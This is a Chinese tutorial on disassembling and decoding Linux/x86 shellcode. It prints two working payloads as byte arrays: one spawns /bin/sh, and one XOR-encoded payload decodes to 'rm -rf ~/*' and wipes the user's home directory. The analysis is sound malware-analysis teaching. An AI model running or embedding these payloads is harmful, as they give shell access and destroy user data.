Shellcode的分析调试方法
导读:下面,我们将分析几个已有的shellcode的功能,通过分析,了解shellcode分析的技巧。 第一个shellcode代码如下: static char shellcode[] = "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89" "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4……
下面,我们将分析几个已有的shellcode的功能,通过分析,了解shellcode分析的技巧。(说明:以下分析均针对32位Linux/x86,`ndisasm -u` 表示按32位模式反汇编。第二个shellcode的载荷具有破坏性,请只做静态分析,或在一次性的虚拟机中操作,不要在真实机器上运行,也不要像下面演示那样以root身份做分析。)

第一个shellcode代码如下:

static char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x58";

使用ndisasm反汇编,结果如下(注意 `echo -e` 不是所有shell的内建echo都支持,例如dash会原样输出"-e";如需可移植的写法可以改用 `printf` 输出字节):

root@linux:~/pentest# echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" | ndisasm -u -
00000000  EB17              jmp short 0x19
00000002  5E                pop esi
00000003  897608            mov [esi+0x8],esi
00000006  31C0              xor eax,eax
00000008  884607            mov [esi+0x7],al
0000000B  89460C            mov [esi+0xc],eax
0000000E  B00B              mov al,0xb
00000010  89F3              mov ebx,esi
00000012  8D4E08            lea ecx,[esi+0x8]
00000015  31D2              xor edx,edx
00000017  CD80              int 0x80
00000019  E8E4FFFFFF        call dword 0x2
0000001E  2F                das
0000001F  62696E            bound ebp,[ecx+0x6e]
00000022  2F                das
00000023  7368              jnc 0x8d
00000025  58                pop eax
root@linux:~/pentest#

分析:0x19处的 call 0x2 会把返回地址(0x1e,也就是字符串"/bin/shX"的起始地址)压栈,0x2处的 pop esi 随即把它取出,这是shellcode里经典的 jmp/call/pop 取地址技巧。0x1e之后的 das/bound/jnc/pop 并不是指令,而是字符串字节被ndisasm当作代码解码的结果,读反汇编时要把这一段当数据看。随后 mov [esi+0x7],al 把末尾的'X'改写成NUL以截断字符串;mov [esi+0x8],esi 和 mov [esi+0xc],eax 紧接着字符串就地构造 argv = {"/bin/sh", NULL};最后 eax=0xb(i386上execve的系统调用号)、ebx=文件名、ecx=argv、edx=0(envp为空),int 0x80 发起调用。可以看出,这是一个执行“/bin/sh”的shellcode,等价于 execve("/bin/sh", {"/bin/sh", NULL}, NULL)。需要注意两点:一是它会向自身所在的内存写数据,因此所在内存必须同时可写、可执行(开启NX/W^X的栈上无法直接运行,放在只读段里也不行);二是这段shellcode本身只有38字节(偏移0x00–0x25),而 [esi+0x8] 和 [esi+0xc] 对应的偏移是0x26和0x2a,写入位置已经在数组末尾之外,它依赖紧随其后的内存可写,单独测试时要把它放进足够大的缓冲区。

第二个shellcode代码如下:

char shellcode2[] =
    "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    "\x7b\x35";

下面使用ndisasm反汇编,结果如下:

root@linux:~/pentest# echo -ne "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7\x7b\x35" | ndisasm -u -
00000000  EB10              jmp short 0x12
00000002  5E                pop esi
00000003  31C9              xor ecx,ecx
00000005  B14B              mov cl,0x4b
00000007  B0FF              mov al,0xff
00000009  3006              xor [esi],al
0000000B  FEC8              dec al
0000000D  46                inc esi
0000000E  E2F9              loop 0x9
00000010  EB05              jmp short 0x17
00000012  E8EBFFFFFF        call dword 0x2
00000017  17                pop ss
00000018  DB                db 0xdb
00000019  FD                std
0000001A  FC                cld
0000001B  FB                sti
0000001C  D59B              aad 0x9b
0000001E  91                xchg eax,ecx
0000001F  99                cdq
00000020  D9869CF38199      fld dword [esi-0x667e0c64]
00000026  F0C28DED          lock ret 0xed8d
0000002A  9E                sahf
0000002B  86CA              xchg cl,dl
0000002D  C49A81C69BCB      les ebx,[edx-0x3464397f]
00000033  C9                leave
00000034  C2D3DE            ret 0xded3
00000037  F0BAB8AAF4B4      lock mov edx,0xb4f4aab8
0000003D  AC                lodsb
0000003E  B4BB              mov ah,0xbb
00000040  D6                salc
00000041  88E5              mov ch,ah
00000043  13825C8DC19D      adc eax,[edx-0x623e72a4]
00000049  40                inc eax
0000004A  91                xchg eax,ecx
0000004B  C0994495CF954C    rcr byte [ecx-0x6a306abc],0x4c
00000052  2F                das
00000053  4A                dec edx
00000054  23F0              and esi,eax
00000056  120F              adc cl,[edi]
00000058  B570              mov ch,0x70
0000005A  3C32              cmp al,0x32
0000005C  7988              jns 0xffffffe6
0000005E  78F7              js 0x57
00000060  7B35              jpo 0x97
root@linux:~/pentest#

分析:前0x17字节是一个自解码器。call 0x2 / pop esi 使 esi 指向0x17处的编码载荷;ecx=0x4b(75字节,正好是98字节总长减去0x17);al从0xff开始,循环里每处理一个字节就 xor [esi],al,然后 dec al、inc esi,也就是第 i 个载荷字节与 (0xff - i) 异或;解码完成后 jmp short 0x17 跳到已解码的载荷执行。0x17之后的反汇编输出(pop ss、fld、lock ret 等)是对尚未解码的数据的无意义解码,不能当作指令来读。由于解码器要改写自身后面的字节,这段shellcode同样要求所在内存可写、可执行。

接下来,我们将使用一个python脚本和hexdump来分析这个shellcode。脚本按解码器的规则对 0x17 之后的每个字节做 0xff-i 异或。它是Python 2写法(print 语句);print 会在输出末尾额外追加一个换行符0x0a,所以下面hexdump得到的是76(0x4c)字节而不是75字节,末尾的0x0a不属于shellcode。

root@linux:~/pentest# cat decode.py
#!/usr/bin/env python
sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" + \
     "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" + \
     "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" + \
     "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" + \
     "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" + \
     "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" + \
     "\x7b\x35"
print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])
root@linux:~/pentest# ./decode.py | hexdump -C
00000000  e8 25 00 00 00 2f 62 69  6e 2f 73 68 00 73 68 00  |.%.../bin/sh.sh.|
00000010  2d 63 00 72 6d 20 2d 72  66 20 7e 2f 2a 20 32 3e  |-c.rm -rf ~/* 2>|
00000020  2f 64 65 76 2f 6e 75 6c  6c 00 5d 31 c0 50 8d 5d  |/dev/null.]1.P.]|
00000030  0e 53 8d 5d 0b 53 8d 5d  08 53 89 eb 89 e1 31 d2  |.S.].S.].S....1.|
00000040  b0 0b cd 80 89 c3 31 c0  40 cd 80 0a              |......1.@...|
0000004c
root@linux:~/pentest#

可以看到“/bin/sh”“sh”“-c”“rm -rf ~/* 2>/dev/null”几个字符串:解码后的载荷会删除当前用户家目录下的全部文件,并把报错静默丢弃。这是破坏性载荷,绝对不能在真实环境中执行。接下来我们使用ndisasm分析:

root@linux:~/pentest# ./decode.py | ndisasm -u -
00000000  E825000000        call dword 0x2a
00000005  2F                das
00000006  62696E            bound ebp,[ecx+0x6e]
00000009  2F                das
0000000A  7368              jnc 0x74
0000000C  007368            add [ebx+0x68],dh
0000000F  002D6300726D      add [dword 0x6d720063],ch
00000015  202D7266207E      and [dword 0x7e206672],ch
0000001B  2F                das
0000001C  2A20              sub ah,[eax]
0000001E  323E              xor bh,[esi]
00000020  2F                das
00000021  6465762F          gs jna 0x54
00000025  6E                outsb
00000026  756C              jnz 0x94
00000028  6C                insb
00000029  005D31            add [ebp+0x31],bl
0000002C  C0508D5D          rcl byte [eax-0x73],0x5d
00000030  0E                push cs
00000031  53                push ebx
00000032  8D5D0B            lea ebx,[ebp+0xb]
00000035  53                push ebx
00000036  8D5D08            lea ebx,[ebp+0x8]
00000039  53                push ebx
0000003A  89EB              mov ebx,ebp
0000003C  89E1              mov ecx,esp
0000003E  31D2              xor edx,edx
00000040  B00B              mov al,0xb
00000042  CD80              int 0x80
00000044  89C3              mov ebx,eax
00000046  31C0              xor eax,eax
00000048  40                inc eax
00000049  CD80              int 0x80
0000004B  0A                db 0x0a
root@linux:~/pentest#

分析:0x0处的 call 0x2a 跳过0x05–0x29的字符串数据("/bin/sh\0sh\0-c\0rm -rf ~/* 2>/dev/null\0"),并把字符串首地址(0x5)压栈。0x05–0x28之间的反汇编全是数据;而且ndisasm在0x29处仍然没有对齐——它把字符串末尾的NUL和后面的 5D 31 拼成了 add [ebp+0x31],bl,随后的 rcl 和 push cs 也是错的——真正的指令从0x2a开始:5D pop ebp、31C0 xor eax,eax、50 push eax(argv末尾的NULL)、8D5D0E lea ebx,[ebp+0xe]、53 push ebx,之后才与上面输出从0x31起的内容重合。要避免这种错位,可以让ndisasm跳过数据段再反汇编,例如 ./decode.py | ndisasm -u -k 5,37 -。pop ebp 之后 ebp 指向"/bin/sh",ebp+0x8 是"sh",ebp+0xb 是"-c",ebp+0xe 是"rm -rf ~/* 2>/dev/null";三个指针按逆序压栈后 ecx=esp 就是argv,ebx=ebp 为文件名,edx=0,eax=0xb,int 0x80 即执行 execve("/bin/sh", {"sh", "-c", "rm -rf ~/* 2>/dev/null", NULL}, NULL)。最后的 mov ebx,eax / xor eax,eax / inc eax / int 0x80 是 exit 调用:execve 只在失败时返回,此时把返回值作为退出码调用 exit,使shellcode在失败时干净退出而不是继续执行后面的字节。0x4b处的 0x0a 是decode.py里print追加的换行符,不是载荷的一部分。